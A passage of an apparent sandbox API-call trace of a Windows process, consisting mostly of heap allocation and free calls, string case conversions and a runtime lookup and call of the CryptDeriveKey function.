lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0189.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0189.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0189.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0189.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0189.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0189.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0189.683] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0189.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0189.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0189.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0189.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0189.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0189.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0189.684] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0189.684] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.684] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.684] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.684] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.685] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0189.685] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.686] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0189.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.686] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.686] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0189.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.686] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0189.686] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.688] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0189.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0189.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0189.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0189.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0189.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0189.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa778, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0189.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.690] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0189.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0189.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0189.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0189.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0189.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0189.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0189.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0189.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0189.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.690] CryptDeriveKey (in: hProv=0xaa3868, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0189.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0189.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0189.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0189.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0189.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0189.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0189.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0189.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0189.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0189.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0189.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 